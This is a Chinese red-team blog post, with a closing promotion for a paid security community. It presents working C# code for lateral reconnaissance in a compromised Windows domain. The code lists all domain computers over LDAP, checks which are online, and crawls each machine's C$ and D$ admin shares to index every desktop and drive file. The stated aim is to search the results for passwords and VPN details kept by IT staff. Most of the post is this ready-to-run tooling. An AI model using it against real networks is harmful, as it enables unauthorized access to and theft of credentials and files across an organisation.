域内批量获取敏感文件
文章首发先知社区:https://xz.aliyun.com/t/11667
域内批量获取敏感文件
域内如果我们要获取指定机器,恰巧那台机器为linux只开了22等端口或者说无法从常规web打点进入,我们可以寻找运维机器的密码本,一台一台翻的话成本太高,就可以通过批量获取域内桌面文件。
0x01 批量获取域内机器名
自动化工具,当然就要全自动,懒人必备。net group "domain computers" /do
,获取机器是3个一排,然后可以通过正则删除空格,每次也麻烦,直接获取机器名更加方便。
思路就是连接ldap然后指定过滤条件(&(objectclass=computer))
获取机器。
获取域内机器
public static DirectoryEntry coon = null;
public static DirectorySearcher search = null;
url = "LDAP://" + ip;
username = domain user;
password = domain pass;
coon = new DirectoryEntry(url, username, password);
search = new DirectorySearcher(coon);
search.Filter = "(&(objectclass=computer))
foreach (SearchResult r in Ldapcoon.search.FindAll())
{
string computername = "";
computername = r.Properties["cn"][0].ToString();
Console.WriteLine(computername);
}
0x02 机器探测存活
1.把上述机器放入machine.txt内,然后逐行读取
StreamReader machine_name = new StreamReader(@"machine.txt");
while (!machine_name.EndOfStream)
{
string machine = machine_name.ReadLine();
Console.WriteLine(machine);
}
2.探测探测存活,这里面向谷歌
public static bool IsMachineUp(string hostName)
{
bool retVal = false;
try
{
Ping pingSender = new Ping();
PingOptions options = new PingOptions();
// Use the default Ttl value which is 128,
// but change the fragmentation behavior.
options.DontFragment = true;
// Create a buffer of 32 bytes of data to be transmitted.
string data = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";
byte[] buffer = Encoding.ASCII.GetBytes(data);
int timeout = 800;
PingReply reply = pingSender.Send(hostName, timeout, buffer, options);
if (reply.Status == IPStatus.Success)
{
retVal = true;
}
}
catch (Exception ex)
{
retVal = false;
//Console.ForegroundColor = ConsoleColor.Red;
//Console.WriteLine("[-]" + ex.Message);
//Console.ForegroundColor = ConsoleColor.White;
}
return retVal;
}
一般来说it机器都为工作机而非服务器,可能存在下班关机等情况,如果大多机器处于关机情况下,就会浪费比较多的时间,所以优先判断存活是很有必要的。
StreamReader machine_name = new StreamReader(@"machine.txt");
while (!machine_name.EndOfStream)
{
try
{
string machine = machine_name.ReadLine();
if (IsMachineUp(machine))
{
//操作
}
}
catch { }
}
0x03 获取桌面文件
我们这里构造获取结果目录呈现结果为:
TargetDesktopinfos
机器1
用户A
文件
用户B
文件
机器2
用户C
文件
用户D
文件
首先获取当前路径创建TargetDesktopinfos目录。
string currentpath = Directory.GetCurrentDirectory();
DesktopFiles = currentpath + "\\TargetDesktopinfos";
Directory.CreateDirectory(DesktopFiles);
然后获取目标机器c:\users\
目录,如果存在该目录创建机器名
string userpath = @"\\" + machine + @"\c$\users";
var user_list = Directory.EnumerateDirectories(userpath);
if (Directory.Exists(userpath))
{
//创建机器名文件夹
string MachineFolder = DesktopFiles + "\\" + machine;
Directory.CreateDirectory(MachineFolder);
再遍历users目录存在哪些用户,同理如果存在desktop目录创建用户名和desktop.txt。
string userpath = @"\\" + machine + @"\c$\users";
var user_list = Directory.EnumerateDirectories(userpath);
if (Directory.Exists(userpath))
{
//创建机器名文件夹
string MachineFolder = DesktopFiles + "\\" + machine;
Directory.CreateDirectory(MachineFolder);
foreach (string user in user_list)
{
string DesktopDirectoryPath = user + "\\desktop";
string username = substring(user);
if (Directory.Exists(DesktopDirectoryPath))
{
//创建用户名文件夹
string UserFolder = MachineFolder + "\\" + username;
Directory.CreateDirectory(UserFolder);
//创建desktop.txt文件
string Desktoptxt = UserFolder + "\\desktop.txt";
StreamWriter sw = File.CreateText(Desktoptxt);
sw.Close();
接下来就是遍历desktop目录所有文件以及文件夹内的文件。
这里用到Directory.GetFileSystemEntries
方法
public static string[] GetFileSystemEntries (string path, string searchPattern, System.IO.SearchOption searchOption);
第一个参数path:要搜索的路径。
第二个参数searchPattern:要与 `path` 中的文件和目录的名称匹配的搜索字符串。
第三个参数searchOption,指定搜索操作是应仅包含当前目录还是应包含所有子目录的枚举值之一。
这里的SearchOption.AllDirectories
我们使用SearchOption.AllDirectories
,表示在搜索操作中包括当前目录和所有它的子目录。
完整代码如下
try
{
string DesktopFiles = "";
//获取机器名
StreamReader machine_name = new StreamReader(@"machine.txt");
while (!machine_name.EndOfStream)
{
try
{
string machine = machine_name.ReadLine();
if (IsMachineUp(machine))
{
//获取当前路径
string currentpath = Directory.GetCurrentDirectory();
DesktopFiles = currentpath + "\\TargetDesktopinfos";
Directory.CreateDirectory(DesktopFiles);
Console.WriteLine("[*]" + machine);
//获取users目录
string userpath = @"\\" + machine + @"\c$\users";
var user_list = Directory.EnumerateDirectories(userpath);
if (Directory.Exists(userpath))
{
//创建机器名文件夹
string MachineFolder = DesktopFiles + "\\" + machine;
Directory.CreateDirectory(MachineFolder);
foreach (string user in user_list)
{
string DesktopDirectoryPath = user + "\\desktop";
string username = substring(user);
if (Directory.Exists(DesktopDirectoryPath))
{
//创建用户名文件夹
string UserFolder = MachineFolder + "\\" + username;
Directory.CreateDirectory(UserFolder);
//创建desktop.txt文件
string Desktoptxt = UserFolder + "\\desktop.txt";
StreamWriter sw = File.CreateText(Desktoptxt);
sw.Close();
string info_user = substring(user);
Console.ForegroundColor = ConsoleColor.Green;
Console.WriteLine("[*]" + info_user);
Console.ForegroundColor = ConsoleColor.White;
string[] AllFiles = Directory.GetFileSystemEntries(DesktopDirectoryPath, "*", SearchOption.AllDirectories);
foreach (string file in AllFiles)
{
Console.WriteLine(file);
string create_time = Directory.GetCreationTime(file).ToString();
string writeFileTo = "create time:" + create_time + " " + file + "\r\n";
File.AppendAllText(Desktoptxt, writeFileTo);
}
}
else
{
continue;
}
}
}
}
else
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("[-]" + machine + " is down");
Console.ForegroundColor = ConsoleColor.White;
}
}
catch (System.Exception ex)
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("[-] error");
Console.WriteLine("[-] Exception: " + ex.Message);
Console.ForegroundColor = ConsoleColor.White;
continue;
}
}
machine_name.Close();
Console.WriteLine("[+]out put to:" + DesktopFiles);
}
catch (System.Exception ex)
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("[-] error");
Console.WriteLine("[-] Exception: " + ex.Message);
Console.ForegroundColor = ConsoleColor.White;
return;
}
同理要获取DEF盘,这里就举例D盘
public static void D()
{
try
{
string DFiles = "";
StreamReader machine_name = new StreamReader(@"machine.txt");
while (!machine_name.EndOfStream)
{
try
{
string machine = machine_name.ReadLine();
if (IsMachineUp(machine))
{
string currentpath = Directory.GetCurrentDirectory();
DFiles = currentpath + "\\DInfos";
Directory.CreateDirectory(DFiles);
Console.ForegroundColor = ConsoleColor.Yellow;
Console.WriteLine("[*]" + machine);
Console.ForegroundColor = ConsoleColor.White;
//获取users目录
string dpath = @"\\" + machine + @"\d$";
var d_list = Directory.EnumerateDirectories(dpath);
if (Directory.Exists(dpath))
{
//创建机器名文件夹
string MachineFolder = DFiles + "\\" + machine;
Directory.CreateDirectory(MachineFolder);
//创建输出文本
string E_txt = MachineFolder + "\\dFiles.txt";
StreamWriter sw = File.CreateText(E_txt);
sw.Close();
try
{
var files = Directory.GetFiles(dpath);
foreach (string file in files)
{
Console.WriteLine(file);
string create_time = Directory.GetCreationTime(file).ToString();
string writeFileTo = "create time:" + create_time + " " + file + "\r\n";
File.AppendAllText(E_txt, writeFileTo);
}
var directorys = Directory.EnumerateDirectories(dpath);
foreach (string directory in directorys)
{
if (!directory.Contains("System Volume Information"))
{
string[] AllFiles = Directory.GetFileSystemEntries(directory, "*", SearchOption.AllDirectories);
foreach (string file in AllFiles)
{
string create_time = Directory.GetCreationTime(file).ToString();
Console.WriteLine(file);
string writeFileTo = "create time:" + create_time + " " + file + "\r\n";
File.AppendAllText(E_txt, writeFileTo);
}
}
}
}
catch (UnauthorizedAccessException ex)
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine(ex.Message);
Console.ForegroundColor = ConsoleColor.White;
//goto cc;
}
}
}
}
catch (System.Exception ex)
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("[-] 不存在D盘");
Console.WriteLine(ex.Message);
Console.ForegroundColor = ConsoleColor.White;
continue;
}
}
machine_name.Close();
Console.WriteLine("[+]out put to:" + DFiles);
}
catch (System.Exception ex)
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("[-] error");
Console.WriteLine("[-] Exception: " + ex.Message);
Console.ForegroundColor = ConsoleColor.White;
return;
}
}
这里我们在08这台域机器桌面存放文件
测试效
结果呈现
接下来直接文件夹搜索password或者vpn等关键字即可。
如果觉得本文不错的话,欢迎加入知识星球,星球内部设立了多个技术版块,目前涵盖“WEB安全”、“内网渗透”、“CTF技术区”、“漏洞分析”、“工具分享”五大类,星球内部新设立红队专栏,成立红队全方位知识体系。目前红队专栏已有以下三大板块:【外部打点】【权限维持】【内网渗透】,即将推出【免杀技术】板块。还可以与嘉宾大佬们接触,在线答疑、互相探讨。
奖励计划
白帽子社区红队知识星球奖励计划活动正在进行中,可参考相关渠道免费加入知识星球,不仅能够在星球中进行学习,更能够在星球中靠自己的技术能力赚取丰厚收益。详细介绍点击文章:(附抽奖福利)
▼扫码关注白帽子社区公众号&加入知识星球▼